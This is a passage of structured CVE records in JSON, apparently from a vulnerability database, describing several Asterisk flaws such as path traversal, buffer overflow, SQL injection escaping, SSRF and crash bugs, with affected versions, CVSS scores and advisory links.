"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-hxj9-xwr8-w8pq",
"discovery": "UNKNOWN"
},
"title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49786",
"datePublished": "2023-12-14T19:47:46.306Z",
"dateReserved": "2023-11-30T13:39:50.862Z",
"dateUpdated": "2025-02-13T17:18:55.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49294 (GCVE-0-2023-49294)
Vulnerability from nvd – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags |
|---|---|
| https://github.com/asterisk/asterisk/security/adv… | x_refsource_CONFIRM |
| https://github.com/asterisk/asterisk/commit/424be… | x_refsource_MISC |
| https://github.com/asterisk/asterisk/blob/master/… | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2023… |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:53:45.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:21.896Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-8857-hfmw-vg8f",
"discovery": "UNKNOWN"
},
"title": "Asterisk Path Traversal vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49294",
"datePublished": "2023-12-14T19:40:46.157Z",
"dateReserved": "2023-11-24T16:45:24.314Z",
"dateUpdated": "2025-02-13T17:18:40.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-37457 (GCVE-0-2023-37457)
Vulnerability from nvd – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
| URL | Tags |
|---|---|
| https://github.com/asterisk/asterisk/security/adv… | x_refsource_CONFIRM |
| https://github.com/asterisk/asterisk/commit/a1ca0… | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2023… |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:30.273Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c= 18.20.0"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c= 20.5.0"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c= 18.9-cert5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:20.393Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-98rc-4j27-74hh",
"discovery": "UNKNOWN"
},
"title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37457",
"datePublished": "2023-12-14T19:43:30.945Z",
"dateReserved": "2023-07-06T13:01:36.996Z",
"dateUpdated": "2025-02-13T17:01:26.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-46837 (GCVE-0-2021-46837)
Vulnerability from nvd – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17- n/a
| URL | Tags |
|---|---|
| https://downloads.asterisk.org/pub/security/AST-2… | |
| https://lists.debian.org/debian-lts-announce/2022… | mailing-list |
| https://www.debian.org/security/2022/dsa-5285 | vendor-advisory |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:17:42.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-46837",
"datePublished": "2022-08-30T00:00:00.000Z",
"dateReserved": "2022-08-30T00:00:00.000Z",
"dateUpdated": "2024-08-04T05:17:42.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26651 (GCVE-0-2022-26651)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:11:43.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26651",
"datePublished": "2022-04-15T00:00:00.000Z",
"dateReserved": "2022-03-07T00:00:00.000Z",
"dateUpdated": "2024-08-03T05:11:43.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26499 (GCVE-0-2022-26499)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26499",
"datePublished": "2022-04-15T00:00:00.000Z",
"dateReserved": "2022-03-06T00:00:00.000Z",
"dateUpdated": "2024-08-03T05:03:32.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26498 (GCVE-0-2022-26498)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-04T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26498",
"datePublished": "2022-04-15T00:00:00.000Z",
"dateReserved": "2022-03-06T00:00:00.000Z",
"dateUpdated": "2024-08-03T05:03:32.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-32558 (GCVE-0-2021-32558)
Vulnerability from nvd – Published: 2021-07-27 05:19 – Updated: 2024-08-03 23:25- n/a
| URL | Tags |
|---|---|
| http://seclists.org/fulldisclosure/2021/Jul/49 | mailing-listx_refsource_FULLDISC |
| http://packetstormsecurity.com/files/163639/Aster… | x_refsource_MISC |
| https://downloads.asterisk.org/pub/security/AST-2… | x_refsource_MISC |
| https://issues.asterisk.org/jira/browse/ASTERISK-29392 | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2021… | mailing-listx_refsource_MLIST |
| https://www.debian.org/security/2021/dsa-4999 | vendor-advisoryx_refsource_DEBIAN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:25:30.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-02T10:06:13.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-32558",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-4999"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-32558",
"datePublished": "2021-07-27T05:19:34.000Z",
"dateReserved": "2021-05-11T00:00:00.000Z",
"dateUpdated": "2024-08-03T23:25:30.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-31878 (GCVE-0-2021-31878)
Vulnerability from nvd – Published: 2021-07-27 05:17 – Updated: 2024-08-03 23:10- n/a
| URL | Tags |
|---|---|
| http://seclists.org/fulldisclosure/2021/Jul/48 | mailing-listx_refsource_FULLDISC |
| http://packetstormsecurity.com/files/163638/Aster… | x_refsource_MISC |
| http://downloads.asterisk.org/pub/security/AST-20… | x_refsource_MISC |
| https://issues.asterisk.org/jira/browse/ASTERISK-29381 | x_refsource_MISC |
| https://downloads.digium.com/pub/security/AST-202… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:10:30.837Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-07-27T11:10:28.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31878",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
